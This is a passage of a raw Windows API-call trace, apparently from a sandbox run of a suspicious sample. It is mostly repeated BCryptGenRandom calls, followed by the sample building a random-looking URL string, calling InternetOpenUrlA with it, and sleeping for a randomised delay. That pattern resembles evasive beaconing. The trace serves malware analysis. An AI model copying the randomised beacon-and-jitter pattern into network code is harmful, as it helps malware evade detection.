pbBuffer=0x46ffd5f) returned 0x0 [0239.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0239.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0239.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e7e, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4d5e7e) returned 0x0 [0239.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0239.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0240.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0240.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5eaf, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x4d5eaf) returned 0x0 [0240.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0240.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.050] GetProcessHeap () returned 0x440000 [0240.050] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0240.050] lstrcpyA (in: lpString1=0x473140, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0240.050] lstrcatA (in: lpString1="\x81\x03", lpString2="/Ab7YHhycq7G8eXktbh3gw9Aqh8Zfp9ur0cc9zvKrx0i9r/175kPnuPsjennS796wnn6q3mzoTl76kfy6Fm1us5rf7u0F/YwypT38b4ww8f88b779Ozzx3zEddg1tcJRwf97uqfWz7K134/6ifjlffi6tv6Ig0L/" | out: lpString1="\x81\x03/Ab7YHhycq7G8eXktbh3gw9Aqh8Zfp9ur0cc9zvKrx0i9r/175kPnuPsjennS796wnn6q3mzoTl76kfy6Fm1us5rf7u0F/YwypT38b4ww8f88b779Ozzx3zEddg1tcJRwf97uqfWz7K134/6ifjlffi6tv6Ig0L/") returned="\x81\x03/Ab7YHhycq7G8eXktbh3gw9Aqh8Zfp9ur0cc9zvKrx0i9r/175kPnuPsjennS796wnn6q3mzoTl76kfy6Fm1us5rf7u0F/YwypT38b4ww8f88b779Ozzx3zEddg1tcJRwf97uqfWz7K134/6ifjlffi6tv6Ig0L/" [0240.050] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0240.051] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/Ab7YHhycq7G8eXktbh3gw9Aqh8Zfp9ur0cc9zvKrx0i9r/175kPnuPsjennS796wnn6q3mzoTl76kfy6Fm1us5rf7u0F/YwypT38b4ww8f88b779Ozzx3zEddg1tcJRwf97uqfWz7K134/6ifjlffi6tv6Ig0L/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0240.051] GetProcessHeap () returned 0x440000 [0240.051] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0240.051] GetProcessHeap () returned 0x440000 [0240.051] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0240.051] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0240.051] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0240.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0240.052] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0240.052] Sleep (dwMilliseconds=0xf6b7) [0240.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0240.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.297] GetProcessHeap () returned 0x440000 [0240.297] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01c50 [0240.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01c51, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a01c51) returned 0x0 [0240.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0240.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.302] BCryptGenRandom 